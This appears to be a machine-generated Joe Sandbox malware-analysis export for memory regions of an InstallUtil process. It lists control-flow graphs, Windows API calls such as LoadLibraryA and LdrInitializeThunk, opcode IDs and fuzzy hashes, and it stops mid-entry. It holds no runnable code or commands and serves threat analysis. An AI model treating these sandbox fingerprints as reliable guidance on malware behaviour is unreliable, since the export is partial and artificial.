                                                control_flow_graph 220 2ab9540-2ab95e5 call 2ab0ec0 * 2 LdrInitializeThunk 230 2ab95ff-2ab9647 call 2ab0ec0 * 2 220->230 231 2ab95e7-2ab95fa 220->231 244 2ab9649-2ab965c 230->244 245 2ab965e-2ab9688 230->245 232 2ab968a-2ab968e 231->232 234 2ab96a1 232->234 235 2ab9690-2ab969c 232->235 238 2ab96a2 234->238 235->234 238->238 244->232 245->232
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 02AB95DC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.449231372.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2ab0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5148e5eb8905a5f0132f9dec775028a470f14844502774a875c281329a6d8b3f
                                                • Instruction ID: ca5b2717e8460f421f133f49bbd46c72f97dc8180d48dff4881be0e00fba461d
                                                • Opcode Fuzzy Hash: 5148e5eb8905a5f0132f9dec775028a470f14844502774a875c281329a6d8b3f
                                                • Instruction Fuzzy Hash: 68414C347001059FD714EB68C9A0BAABBF6EF88314F258069D816E7395CF72AC42CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dd919822a8fb44b261b68548a17f07f1b17244c7bcf4bf385bd56013117cb5a
                                                • Instruction ID: 3dc309f2b00c3295582d2292fd49da7646b70151b1a185f3bbc14888dd51f476
                                                • Opcode Fuzzy Hash: 6dd919822a8fb44b261b68548a17f07f1b17244c7bcf4bf385bd56013117cb5a
                                                • Instruction Fuzzy Hash: E5D16275E00219DFCB14DFA8C484AAEFBF2FF49310F14855AE419AB391DB74A946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 159 5a13159-5a131a1 LdrInitializeThunk 162 5a131a7-5a131b3 159->162 163 5a134c6-5a134d9 159->163 164 5a134e4 162->164 165 5a131b9-5a1321a 162->165 166 5a134e9-5a134f0 163->166 164->166 175 5a13220-5a13271 165->175 176 5a1347c-5a13498 165->176 167 5a134f2-5a13501 166->167 168 5a13506 166->168 167->168 170 5a13507 168->170 170->170 175->176 185 5a13277-5a132df 175->185 178 5a1349a-5a134a9 176->178 179 5a134ae-5a134c0 176->179 178->179 179->162 179->163 192 5a132e5-5a1333c 185->192 193 5a13376-5a13381 185->193 192->193 203 5a1333e-5a13374 192->203 196 5a13383-5a133bb 193->196 204 5a133c1-5a13418 196->204 205 5a13452-5a1345d 196->205 203->196 204->205 216 5a1341a-5a13450 204->216 210 5a1345f-5a13475 205->210 210->176 216->210
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460740580.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5a10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4c82f027defb72493d709a1fd2f45ea60c85a4d5359091a6754d3dc2a26ea5f9
                                                • Instruction ID: 7dd731ae04362b395cee3c005ce8af669181a29bffb5c933d56057838a543fec
                                                • Opcode Fuzzy Hash: 4c82f027defb72493d709a1fd2f45ea60c85a4d5359091a6754d3dc2a26ea5f9
                                                • Instruction Fuzzy Hash: 98B1D4387011418FCB54EB18DA90B6AB7B6FB88214F24C4AAD91AD7355DB32ED42CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 266 5a1c5dc-5a1c63f 268 5a1c641-5a1c64b 266->268 269 5a1c678-5a1c6c2 LoadLibraryA 266->269 268->269 270 5a1c64d-5a1c64f 268->270 274 5a1c6c4-5a1c6ca 269->274 275 5a1c6cb-5a1c6fc 269->275 271 5a1c651-5a1c65b 270->271 272 5a1c672-5a1c675 270->272 276 5a1c65d 271->276 277 5a1c65f-5a1c66e 271->277 272->269 274->275 281 5a1c70c 275->281 282 5a1c6fe-5a1c702 275->282 276->277 277->277 279 5a1c670 277->279 279->272 284 5a1c70d 281->284 282->281 283 5a1c704 282->283 283->281 284->284
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 05A1C6B2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460740580.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5a10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 13300c81da30ea9c61cd270fa0023cfee2d1eeaa819acbf981fd9e4e92985532
                                                • Instruction ID: dcd5f17a2cdeecbc323c5e77fe2e2fb2614df98bcd5a504fdeec0e8e79bd1266
                                                • Opcode Fuzzy Hash: 13300c81da30ea9c61cd270fa0023cfee2d1eeaa819acbf981fd9e4e92985532
                                                • Instruction Fuzzy Hash: 1F3147B0D00359DFDB24CFA9C895B9EBBB1FB09320F10952AE825A7340D7749881CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 247 5a19a6c-5a1c63f 249 5a1c641-5a1c64b 247->249 250 5a1c678-5a1c6c2 LoadLibraryA 247->250 249->250 251 5a1c64d-5a1c64f 249->251 255 5a1c6c4-5a1c6ca 250->255 256 5a1c6cb-5a1c6fc 250->256 252 5a1c651-5a1c65b 251->252 253 5a1c672-5a1c675 251->253 257 5a1c65d 252->257 258 5a1c65f-5a1c66e 252->258 253->250 255->256 262 5a1c70c 256->262 263 5a1c6fe-5a1c702 256->263 257->258 258->258 260 5a1c670 258->260 260->253 265 5a1c70d 262->265 263->262 264 5a1c704 263->264 264->262 265->265
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 05A1C6B2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460740580.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5a10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: bec0ee468e928f0e158debf7b5360196dfd71dc06ffa6c6220cff6a3e51b5d43
                                                • Instruction ID: ccecfbfd4f59f9147bbc55f399272a80db00ca1ad314558a21032a8e3e4d2cc0
                                                • Opcode Fuzzy Hash: bec0ee468e928f0e158debf7b5360196dfd71dc06ffa6c6220cff6a3e51b5d43
                                                • Instruction Fuzzy Hash: B63127B0D44359DFDB24CF99C954B9EBBF1BB09320F10952AE825A7340D7B49841CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 907 2ab9530-2ab9590 call 2ab0ec0 912 2ab9595-2ab959d 907->912 913 2ab95a2-2ab95cb call 2ab0ec0 912->913 917 2ab95d0-2ab95e5 LdrInitializeThunk 913->917 918 2ab95ff-2ab9647 call 2ab0ec0 * 2 917->918 919 2ab95e7-2ab95fa 917->919 932 2ab9649-2ab965c 918->932 933 2ab965e-2ab9688 918->933 920 2ab968a-2ab968e 919->920 922 2ab96a1 920->922 923 2ab9690-2ab969c 920->923 926 2ab96a2 922->926 923->922 926->926 932->920 933->920
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 02AB95DC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.449231372.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2ab0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8bd4a3cea8a18159fa19246db617a8f58184037b7a5ab848a4ed9845c787e417
                                                • Instruction ID: 8416bb8d2207277c1a85417f490e3cbfa86620ca5476dc38f4b6c18bc692843a
                                                • Opcode Fuzzy Hash: 8bd4a3cea8a18159fa19246db617a8f58184037b7a5ab848a4ed9845c787e417
                                                • Instruction Fuzzy Hash: 9A211C346101449FD744DB58C991BAAB7FAEB88214F288069D805E7395CB72AC06CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 935 2abec98-2abece4 937 2abed4a-2abed65 935->937 938 2abece6-2abed28 MonitorFromPoint 935->938 945 2abed67-2abed74 937->945 941 2abed2a-2abed30 938->941 942 2abed31-2abed3c 938->942 941->942 947 2abed3f call 5a106a0 942->947 948 2abed3f call 5a10690 942->948 944 2abed45-2abed48 944->945 947->944 948->944
                                                APIs
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 02ABED17
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.449231372.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2ab0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: FromMonitorPoint
                                                • String ID:
                                                • API String ID: 1566494148-0
                                                • Opcode ID: 4d81b52dcb1480cdfe0aca420e1d7d93cd45767d1e47721de39a5603490e048a
                                                • Instruction ID: c685f9ed73ef9f730f5c421823a5534cfe64335e94b1d6dffc215a68ca388a77
                                                • Opcode Fuzzy Hash: 4d81b52dcb1480cdfe0aca420e1d7d93cd45767d1e47721de39a5603490e048a
                                                • Instruction Fuzzy Hash: 39217A70A003089FDB20DF99D545BEEBBB5EF88314F14801AE955BB381CB786944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 949 2abec88-2abece4 952 2abed4a-2abed65 949->952 953 2abece6-2abed28 MonitorFromPoint 949->953 960 2abed67-2abed74 952->960 956 2abed2a-2abed30 953->956 957 2abed31-2abed3c 953->957 956->957 962 2abed3f call 5a106a0 957->962 963 2abed3f call 5a10690 957->963 959 2abed45-2abed48 959->960 962->959 963->959
                                                APIs
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 02ABED17
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.449231372.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2ab0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: FromMonitorPoint
                                                • String ID:
                                                • API String ID: 1566494148-0
                                                • Opcode ID: 9145f1b9c897d6e8e8b895789d93d11dd704442dcfc057c0b3cbce18bf5f9cc8
                                                • Instruction ID: 3a4ad9d79e9795497c1289e406195b0dd84ce64e784c48b9dd6139ffe96bdc13
                                                • Opcode Fuzzy Hash: 9145f1b9c897d6e8e8b895789d93d11dd704442dcfc057c0b3cbce18bf5f9cc8
                                                • Instruction Fuzzy Hash: C92159B19003489FDB20CF99D945BEEBBB4EF48724F14801AE855B7381CB78A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 964 5a127e2-5a127e9 965 5a127eb-5a127f9 KiUserExceptionDispatcher 964->965 966 5a1278a-5a1278c 964->966 968 5a12720-5a12751 966->968 969 5a1278e-5a12791 966->969 971 5a1275b-5a12786 968->971 970 5a12793-5a127d1 969->970 969->971 971->966
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 05A127F3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460740580.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5a10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 71a5de3a69eea38a12b78a64405b90969bdbe0f8b99a28092053392380e2de8e
                                                • Instruction ID: 4db481742e86ab9e4f120ec3deaf0fd445e95ba7574e2b77ee325c443f431778
                                                • Opcode Fuzzy Hash: 71a5de3a69eea38a12b78a64405b90969bdbe0f8b99a28092053392380e2de8e
                                                • Instruction Fuzzy Hash: 34115E75B500186FDB15A7A8D920BAF6B6FEFD9340F108059D80AA3695CE259C038BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 982 2ab9364-2ab936c 983 2ab938e-2ab9393 982->983 984 2ab9377-2ab937a 983->984 985 2ab9395-2ab93a2 983->985 988 2ab9402-2ab9407 984->988 989 2ab9380-2ab938d KiUserExceptionDispatcher 984->989 986 2ab93b6-2ab93c3 985->986 987 2ab93a4-2ab93a8 985->987 990 2ab93d7-2ab93e6 986->990 991 2ab93c5-2ab93d5 986->991 1003 2ab93ab call 2ab96ef 987->1003 1004 2ab93ab call 2ab9700 987->1004 996 2ab940c-2ab9413 988->996 989->983 1001 2ab93e9 call 2ab9e28 990->1001 1002 2ab93e9 call 2ab9e38 990->1002 991->990 993 2ab93b1-2ab93b4 993->986 993->987 997 2ab93ef-2ab93f6 997->996 998 2ab93f8-2ab93fb call 2ab69b0 997->998 1000 2ab9400 998->1000 1000->996 1001->997 1002->997 1003->993 1004->993
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 02AB9387
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.449231372.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2ab0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 651a8c8b80c5847b2da9ef442332183e79071d20b7c32ca8e51ecd37cb6a5f13
                                                • Instruction ID: e3c810b82057fa0771e13055678e43eb72ccdfeac23078871cb33267e3025b45
                                                • Opcode Fuzzy Hash: 651a8c8b80c5847b2da9ef442332183e79071d20b7c32ca8e51ecd37cb6a5f13
                                                • Instruction Fuzzy Hash: 75114C36601550CBDB16EF98D5D569EBB3AFF88310B224095D9069B29ACF30BC92CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1005 5a12832-5a12839 1006 5a1283b-5a12865 1005->1006 1007 5a127da-5a127e0 1005->1007 1008 5a127e3-5a127e9 1007->1008 1009 5a12782-5a12795 1007->1009 1010 5a127eb-5a127f9 KiUserExceptionDispatcher 1008->1010 1011 5a1278a-5a1278c 1008->1011 1014 5a1279f-5a127d1 1009->1014 1017 5a12720-5a12751 1011->1017 1018 5a1278e-5a12791 1011->1018 1021 5a1275b-5a12786 1017->1021 1020 5a12793-5a12795 1018->1020 1018->1021 1020->1014 1021->1011
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 05A127F3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460740580.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5a10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 63d114225936d3ec5358b9038556880a6e2d241d10c0b0029b83fbe07aa80ed1
                                                • Instruction ID: 2d3d2cb0100669c6748bf03a35489ece20791daea6659a1d5c11b97768943d52
                                                • Opcode Fuzzy Hash: 63d114225936d3ec5358b9038556880a6e2d241d10c0b0029b83fbe07aa80ed1
                                                • Instruction Fuzzy Hash: 7C01F936B080645FDB049659EC11BBA7F66DFD6311F188077E90AD7381CA29CC0387A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1029 2ab9376 1030 2ab9377-2ab937a 1029->1030 1031 2ab9402-2ab9407 1030->1031 1032 2ab9380-2ab9393 KiUserExceptionDispatcher 1030->1032 1038 2ab940c-2ab9413 1031->1038 1032->1030 1035 2ab9395-2ab93a2 1032->1035 1036 2ab93b6-2ab93c3 1035->1036 1037 2ab93a4-2ab93a8 1035->1037 1039 2ab93d7-2ab93e6 1036->1039 1040 2ab93c5-2ab93d5 1036->1040 1048 2ab93ab call 2ab96ef 1037->1048 1049 2ab93ab call 2ab9700 1037->1049 1050 2ab93e9 call 2ab9e28 1039->1050 1051 2ab93e9 call 2ab9e38 1039->1051 1040->1039 1041 2ab93b1-2ab93b4 1041->1036 1041->1037 1044 2ab93ef-2ab93f6 1044->1038 1045 2ab93f8-2ab93fb call 2ab69b0 1044->1045 1047 2ab9400 1045->1047 1047->1038 1048->1041 1049->1041 1050->1044 1051->1044
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 02AB9387
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.449231372.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2ab0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 205a0e52bc53fd54d81daaf24d69bd9769cdcbb11786acf56b53e5fceacad27a
                                                • Instruction ID: d176abad4b7f83b28941a436205d72ea9fd0abe6af960de9b4b1138579e8edee
                                                • Opcode Fuzzy Hash: 205a0e52bc53fd54d81daaf24d69bd9769cdcbb11786acf56b53e5fceacad27a
                                                • Instruction Fuzzy Hash: 12113C36601554CBDB16DF48D9D569EB73AFF88320B268055D9469B28ACF30FC82CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1052 55244e0-55244f6 1053 5524b9c-5524ba5 1052->1053 1054 55244fc-55244fe 1052->1054 1054->1053 1055 5524504-552450a 1054->1055 1056 5524510-5524516 1055->1056 1057 552496c-5524975 1055->1057 1060 5524518-552451a 1056->1060 1061 552451c-552451e 1056->1061 1058 5524977 1057->1058 1059 552497e-5524982 1057->1059 1058->1059 1065 5524a17-5524a1d 1058->1065 1066 5524b64-5524b98 call 55231c4 1058->1066 1067 5524b9a 1058->1067 1068 55249ea-55249f0 1058->1068 1069 55249bb-55249c1 1058->1069 1070 5524aa9-5524aaf 1058->1070 1071 552498d-5524993 1058->1071 1062 5524b38-5524b3e 1059->1062 1063 5524988 1059->1063 1064 5524528-552453f 1060->1064 1061->1064 1078 5524b40-5524b42 1062->1078 1079 5524b4c-5524b62 1062->1079 1063->1067 1091 5524541 1064->1091 1092 5524548-552454c 1064->1092 1074 5524a21-5524a2d 1065->1074 1075 5524a1f 1065->1075 1066->1053 1067->1053 1080 55249f2-55249f4 1068->1080 1081 55249fe 1068->1081 1076 55249c3-55249c5 1069->1076 1077 55249cf-55249e5 1069->1077 1082 5524ab3-5524abf 1070->1082 1083 5524ab1 1070->1083 1072 55249a1-55249b6 1071->1072 1073 5524995-5524997 1071->1073 1072->1053 1073->1072 1086 5524a2f-5524a66 1074->1086 1075->1086 1076->1077 1077->1053 1078->1079 1079->1053 1080->1081 1088 5524a08-5524a12 1081->1088 1084 5524ac1-5524af8 1082->1084 1083->1084 1121 5524b00-5524b20 1084->1121 1122 5524afa-5524afe 1084->1122 1123 5524a68-5524a6c 1086->1123 1124 5524a6e-5524a8e 1086->1124 1088->1053 1091->1091 1099 5524552-5524967 1092->1099 1100 552486e-5524883 1092->1100 1099->1053 1100->1053 1106 5524889-55248ab 1100->1106 1115 55248b9-55248c6 1106->1115 1116 55248ad-55248af 1106->1116 1119 5524ba8-5524bcf 1115->1119 1120 55248cc-55248d7 1115->1120 1116->1115 1120->1106 1125 55248d9 1120->1125 1126 5524b22-5524b36 1121->1126 1122->1126 1127 5524a90-5524aa4 1123->1127 1124->1127 1125->1053 1126->1053 1127->1053
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: g
                                                • API String ID: 0-30677878
                                                • Opcode ID: 0086db381e0631c9253e1b11cc53266148221e2ae376fbe38ef82fd3a741d7fc
                                                • Instruction ID: 2bb3d03a0833c8cf3326c5c92301883ebf0cf0f6e80c3e55dae62ecc331e82ff
                                                • Opcode Fuzzy Hash: 0086db381e0631c9253e1b11cc53266148221e2ae376fbe38ef82fd3a741d7fc
                                                • Instruction Fuzzy Hash: 4881A871B04125CFCF289BAD849027EB6E3BFC6211729896DD40AEB385DE39DC41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 708f9250cb68e89d2d826508b814568e198290d6fb0323c5acc00239e2c96dee
                                                • Instruction ID: 069bc2ad24fdff8a4dd58f266a1cf71524d616bd1a4ae3df8193c536ba363731
                                                • Opcode Fuzzy Hash: 708f9250cb68e89d2d826508b814568e198290d6fb0323c5acc00239e2c96dee
                                                • Instruction Fuzzy Hash: 71E18130A00715DFDB18DFA9C494B6DBBF3BF85304F548929D00A9B294DB78E885CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c832c5bcb508edecf50492073484d42f17cd89a1fee3c13432d0e04342e8c8ce
                                                • Instruction ID: 6f6245cef80ab9bdd3479799628c0c1959dcdf12405623c315fe03975732a25c
                                                • Opcode Fuzzy Hash: c832c5bcb508edecf50492073484d42f17cd89a1fee3c13432d0e04342e8c8ce
                                                • Instruction Fuzzy Hash: C4B13D74A02215DFDB14DF68D498A6EBBB2FF89310F148969E4169B3E1DB30EC41CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8de52ce096a728f59f89eba14acf860932432f4a2e24167290cda97a6f694cf
                                                • Instruction ID: b9f78d8b5ac533bc5275e63fe2ef5955a95368c9219f39420f96ec39173438fc
                                                • Opcode Fuzzy Hash: d8de52ce096a728f59f89eba14acf860932432f4a2e24167290cda97a6f694cf
                                                • Instruction Fuzzy Hash: B4719D31A006159FDB18DB69C494BAEBBF3BB85210F148469D506AB390DF35AC46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7655d8b104fa240387243a558cf89d0497229bc8c8626731e85b45c4613e39f0
                                                • Instruction ID: af1fd804c2a7231e6dbc71296ecbe840897039a5b2d0c4feed13548440943769
                                                • Opcode Fuzzy Hash: 7655d8b104fa240387243a558cf89d0497229bc8c8626731e85b45c4613e39f0
                                                • Instruction Fuzzy Hash: EB718139A012158FCB14DBA8D454AAEBBF2FF89310F14856DD409EB3A1DB75ED41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac3537b5ee5621955bc600174ce4c56529d8e57dc94345c7942f15326ed5c00c
                                                • Instruction ID: dd0342ba84ae1e66db3343f59a2f064ef6578fddf782bcdad59ece1a80a5a2f2
                                                • Opcode Fuzzy Hash: ac3537b5ee5621955bc600174ce4c56529d8e57dc94345c7942f15326ed5c00c
                                                • Instruction Fuzzy Hash: B7615474A06315DFDB28DF68D588A6EBBB2FF85310F548869E4169B3E1C730D881CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67c2f20eb0190e7efc7ff51d426e703a0bf6656e7473662154627fcf0fb5fb0b
                                                • Instruction ID: 59aa676adf4f1ebc8756b57cf6b322c3ef7615e9afe93223010800e74e8d9ae5
                                                • Opcode Fuzzy Hash: 67c2f20eb0190e7efc7ff51d426e703a0bf6656e7473662154627fcf0fb5fb0b
                                                • Instruction Fuzzy Hash: 88518131705A1A9FC715DF6DC4909AEBBF2FF89310B148A29D40A97791DB34E805CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8edc83f37259edd19e15a7d6f0ace4e1df282099c215b6536c24cc8d4e979188
                                                • Instruction ID: 952e7c7da418e2544555d1251d718147a568c3781f85f3c4e1686663e60c83f9
                                                • Opcode Fuzzy Hash: 8edc83f37259edd19e15a7d6f0ace4e1df282099c215b6536c24cc8d4e979188
                                                • Instruction Fuzzy Hash: 2241F5343002116FCB14AB69D850A6EBBABFFC5351B448529E90ADB381DF79DC05CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ef85f3a6e5fa25268c479a8e92de8055a49fe80d8cc2df1870e9b5e089da721
                                                • Instruction ID: 0f12a783c6dc437d9d9ade37109adc7f26aa5de0ebe0af741c891c24c994ba60
                                                • Opcode Fuzzy Hash: 3ef85f3a6e5fa25268c479a8e92de8055a49fe80d8cc2df1870e9b5e089da721
                                                • Instruction Fuzzy Hash: 97512B75A01604DFDB14DFA4D594A9DBBF2FF89315F14886DE40A973A0DB32A842CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a132a1beee091526e233fe1c3c587020c05aa7917a52622bcaac19f1af6a7373
                                                • Instruction ID: 2d98a4da992c3f701016684d6760eea2f8a92d8d77c98ce58fbafd520f1d8b30
                                                • Opcode Fuzzy Hash: a132a1beee091526e233fe1c3c587020c05aa7917a52622bcaac19f1af6a7373
                                                • Instruction Fuzzy Hash: 38513A75A02704DFDB14DFA4D594A99BBB2FF89315F14886DE406A73A0DB32E882CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.460167149.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5520000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
